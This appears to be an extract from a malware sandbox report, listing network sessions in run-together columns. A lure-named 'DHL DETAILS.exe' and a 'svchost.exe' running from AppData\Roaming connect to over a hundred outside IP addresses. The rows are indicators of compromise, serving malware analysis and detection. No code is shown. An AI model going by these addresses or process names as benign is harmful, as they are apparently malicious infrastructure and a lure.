                                                                                    5655192.168.2.554020185.38.111.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5656192.168.2.54932464.227.108.253190843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5657192.168.2.554022221.224.44.9173026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5658192.168.2.5541798.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5659192.168.2.55421051.77.222.481186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5660192.168.2.55415143.155.170.35156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5661192.168.2.551747189.240.60.16990906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5662192.168.2.551682148.72.215.230443876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5663192.168.2.554109178.54.21.20380816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5664192.168.2.554591199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5665192.168.2.55428089.185.212.198320006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5666192.168.2.554284119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5667192.168.2.554431185.103.101.39100516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5668192.168.2.5543488.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5669192.168.2.554023103.190.54.141806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5670192.168.2.56427345.65.138.4899943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5671192.168.2.55448643.163.192.3156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5672192.168.2.551325203.124.53.12256786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5673192.168.2.55199662.112.10.2680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5674192.168.2.562299149.102.130.1208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5675192.168.2.5544913.9.71.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5676192.168.2.554493147.75.92.251100066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5677192.168.2.564272209.14.112.2108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5678192.168.2.55224372.167.222.10294936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5679192.168.2.55420994.131.60.1995837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5680192.168.2.554998104.16.143.127806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5681192.168.2.555052172.67.181.149806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5682192.168.2.555071104.25.231.184806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5683192.168.2.552200104.16.241.204806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5684192.168.2.55458718.133.16.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5685192.168.2.555100172.67.181.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5686192.168.2.55205246.231.72.3556786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5687192.168.2.55191046.98.185.16056786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5688192.168.2.562265195.78.100.162362956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5689192.168.2.555225172.67.181.9806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5690192.168.2.55222892.204.135.3786236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5691192.168.2.554666154.12.178.107299856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5692192.168.2.554636193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5693192.168.2.55464894.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5694192.168.2.55460539.99.144.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5695192.168.2.564394107.180.88.1733577443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5696192.168.2.554560195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5697192.168.2.555243104.19.109.209806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5698192.168.2.554642218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5699192.168.2.549634125.227.225.157338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5700192.168.2.55468843.131.242.162156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5701192.168.2.55484713.40.239.13031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5702192.168.2.55476577.91.74.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5703192.168.2.554745185.81.153.16233896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5704192.168.2.554838195.248.243.14972376352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5705192.168.2.5550433.127.62.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5706192.168.2.554791216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5707192.168.2.55265469.167.169.46129036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5708192.168.2.555053185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5709192.168.2.555086114.156.77.10780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5710192.168.2.552541139.162.224.3731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5711192.168.2.55257551.15.242.20288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5712192.168.2.55242545.11.95.16560396352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5713192.168.2.552557190.186.18.1619996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5714192.168.2.54946745.174.87.1899956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5715192.168.2.552684207.180.234.220377366352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5716192.168.2.549473190.94.212.12599956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5717192.168.2.5552308.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5718192.168.2.555297199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5719192.168.2.555294142.4.123.4180
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5720192.168.2.555203162.55.87.4855666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5721192.168.2.55332691.92.155.20731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5722192.168.2.55522982.137.244.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5723192.168.2.55539354.67.125.45312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5724192.168.2.55304267.43.236.20182036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5725192.168.2.555366162.214.165.2038043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5726192.168.2.54944451.75.125.2084811456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5727192.168.2.555502104.20.56.718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5728192.168.2.555528104.16.226.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5729192.168.2.549485181.143.11.1571021943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5730192.168.2.55260694.131.14.6610816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5731192.168.2.55257991.134.140.16088796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5732192.168.2.554633180.250.159.4941536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5733192.168.2.555606104.16.105.158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5734192.168.2.549492177.234.244.1743221343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5735192.168.2.555638104.22.37.2368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5736192.168.2.555584164.92.86.1135739143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5737192.168.2.555408172.93.213.1778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5738192.168.2.555778202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5739192.168.2.555781202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5740192.168.2.555787202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5741192.168.2.555795202.159.19.21344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5742192.168.2.55565223.227.38.1988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5743192.168.2.553140173.212.240.168102676352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5744192.168.2.564509154.85.58.1498056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5745192.168.2.551712142.54.232.641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5746192.168.2.55529349.228.131.169500043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5747192.168.2.55565023.152.40.15505043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5748192.168.2.555703104.19.217.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5749192.168.2.549570162.240.231.2116210943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5750192.168.2.5553285.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5751192.168.2.555412119.196.168.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5752192.168.2.555385193.8.87.43444443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5753192.168.2.55602443.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5754192.168.2.55602843.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5755192.168.2.55603043.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5756192.168.2.55603143.152.192.21744343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5757192.168.2.55377274.119.144.6041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5758192.168.2.555481203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5759192.168.2.555737104.16.105.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5760192.168.2.555728104.25.244.708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5761192.168.2.55551845.120.178.197108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5762192.168.2.555743104.27.66.318043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5763192.168.2.556039202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5764192.168.2.55530243.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5765192.168.2.556052202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5766192.168.2.556066202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5767192.168.2.556100202.159.35.18944343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5768192.168.2.55557060.246.122.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5769192.168.2.55219672.217.158.20241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5770192.168.2.55560082.64.77.308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5771192.168.2.55529593.171.220.229888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5772192.168.2.555747172.67.182.388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5773192.168.2.555391103.120.6.468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5774192.168.2.555777104.18.254.768043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5775192.168.2.54941745.195.149.79108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5776192.168.2.55557978.30.128.10808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5777192.168.2.555450139.129.202.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5778192.168.2.555783159.89.138.1308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5779192.168.2.5555898.222.152.1585555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5780192.168.2.553174201.91.82.15531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5781192.168.2.555861172.64.86.2178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5782192.168.2.555810162.214.225.2234343543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5783192.168.2.555854104.20.205.1918043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5784192.168.2.555874172.67.182.1538043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5785192.168.2.555876104.19.235.108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5786192.168.2.55558593.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5787192.168.2.55584647.88.3.19808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5788192.168.2.55589645.12.31.1048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5789192.168.2.55570743.163.192.31567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5790192.168.2.555909104.23.100.738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5791192.168.2.555480106.105.218.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5792192.168.2.555921104.238.111.107799943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5793192.168.2.55534842.49.148.167900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5794192.168.2.553481213.184.153.6680806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
